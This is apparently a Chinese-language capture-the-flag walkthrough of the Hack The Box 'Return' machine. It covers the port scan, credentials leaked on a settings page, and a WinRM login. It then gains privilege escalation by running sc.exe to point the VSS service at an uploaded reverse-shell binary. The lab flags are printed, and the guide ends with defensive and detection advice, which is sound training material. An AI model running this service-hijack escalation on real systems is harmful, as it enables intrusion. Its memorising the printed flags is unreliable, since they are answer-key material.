[Meachines] [Easy] Return HTB Printer+Server Operators sc.exe VSS权限提升
字数 1029 2025-08-22 12:23:36

HTB Printer 渗透测试与权限提升实战指南

1. 目标信息收集

1.1 初始扫描

目标IP: 10.10.11.108

开放端口与服务识别:

53/tcp    - domain (Simple DNS Plus)
80/tcp    - http (Microsoft IIS 10.0)
88/tcp    - kerberos-sec
135/tcp   - msrpc
139/tcp   - netbios-ssn
389/tcp   - ldap (Active Directory)
445/tcp   - microsoft-ds
464/tcp   - kpasswd5
593/tcp   - ncacn_http (RPC over HTTP)
636/tcp   - tcpwrapped
3268/tcp  - ldap (Global Catalog)
3269/tcp  - tcpwrapped
5985/tcp  - http (WinRM)
9389/tcp  - mc-nmf (.NET Message Framing)
47001/tcp - http
49664-49694/tcp - 各种RPC服务

1.2 重要发现

  • 域名: return.local
  • 主机名: PRINTER
  • 操作系统: Windows
  • Web服务器: Microsoft IIS 10.0
  • 存在Active Directory环境

2. 初始访问

2.1 添加主机记录

echo '10.10.11.108 return.local' >> /etc/hosts

2.2 目录爆破

使用feroxbuster发现敏感页面:

feroxbuster -u 'http://return.local'

发现/settings.php页面,其中包含凭据泄露:

username: svc-printer
password: 1edFg43012!!

2.3 使用WinRM连接

evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

成功获取初始shell并找到user flag:

4ecb3465f8852379c83e00e41b74a965

3. 权限提升

3.1 权限分析

检查当前用户权限:

net user svc-printer

发现svc-printer用户属于Server Operators组,该组在Active Directory中具有较高权限。

3.2 利用VSS服务提权

  1. 准备反向shell:
    在攻击机上准备一个Windows反向shell可执行文件reverse_win_win_x86_64.exe

  2. 上传反向shell:
    将反向shell上传到目标机的C:\Users\svc-printer\Documents\目录

  3. 修改VSS服务配置:

    sc.exe config vss binPath="C:\Users\svc-printer\Documents\reverse_win_win_x86_64.exe"

  4. 重启服务:

    sc.exe stop vss
sc.exe start vss

  5. 获取SYSTEM权限:
    服务重启后会以SYSTEM权限执行我们的反向shell,从而获得最高权限。

3.3 获取root flag

a1f1abb04c0ca7e4003fb5794fd4b44

4. 技术要点总结

  1. Server Operators组权限:

    • 可以配置系统服务
    • 可以启动/停止服务
    • 这些权限足以修改服务二进制路径实现提权

  2. VSS服务利用原理:

    • Volume Shadow Copy服务默认以SYSTEM权限运行
    • 通过修改其二进制路径可以执行任意代码
    • 重启服务后即获得SYSTEM权限

  3. 防御措施:

    • 限制Server Operators组的权限
    • 监控服务配置变更
    • 实施最小权限原则

5. 扩展思考

  1. 替代方法:

    • 也可以利用其他系统服务如Print Spooler
    • 使用icacls检查服务二进制文件的权限

  2. 检测方法:

    • 监控sc.exe config命令的使用
    • 审计服务二进制路径变更

  3. 加固建议:

    • 禁用不必要的服务
    • 限制服务账户权限
    • 启用Windows事件日志记录服务变更

通过本案例,我们学习了如何利用服务配置不当进行权限提升,这是Windows环境中常见的高危漏洞之一。

HTB Printer 渗透测试与权限提升实战指南 1. 目标信息收集 1.1 初始扫描 目标IP: 10.10.11.108 开放端口与服务识别 : 1.2 重要发现 域名: return.local 主机名: PRINTER 操作系统: Windows Web服务器: Microsoft IIS 10.0 存在Active Directory环境 2. 初始访问 2.1 添加主机记录 2.2 目录爆破 使用feroxbuster发现敏感页面: 发现 /settings.php 页面,其中包含凭据泄露: 2.3 使用WinRM连接 成功获取初始shell并找到user flag: 3. 权限提升 3.1 权限分析 检查当前用户权限: 发现 svc-printer 用户属于 Server Operators 组,该组在Active Directory中具有较高权限。 3.2 利用VSS服务提权 准备反向shell : 在攻击机上准备一个Windows反向shell可执行文件 reverse_win_win_x86_64.exe 上传反向shell : 将反向shell上传到目标机的 C:\Users\svc-printer\Documents\ 目录 修改VSS服务配置 : 重启服务 : 获取SYSTEM权限 : 服务重启后会以SYSTEM权限执行我们的反向shell,从而获得最高权限。 3.3 获取root flag 4. 技术要点总结 Server Operators组权限 : 可以配置系统服务 可以启动/停止服务 这些权限足以修改服务二进制路径实现提权 VSS服务利用原理 : Volume Shadow Copy服务默认以SYSTEM权限运行 通过修改其二进制路径可以执行任意代码 重启服务后即获得SYSTEM权限 防御措施 : 限制Server Operators组的权限 监控服务配置变更 实施最小权限原则 5. 扩展思考 替代方法 : 也可以利用其他系统服务如 Print Spooler 等 使用 icacls 检查服务二进制文件的权限 检测方法 : 监控 sc.exe config 命令的使用 审计服务二进制路径变更 加固建议 : 禁用不必要的服务 限制服务账户权限 启用Windows事件日志记录服务变更 通过本案例,我们学习了如何利用服务配置不当进行权限提升,这是Windows环境中常见的高危漏洞之一。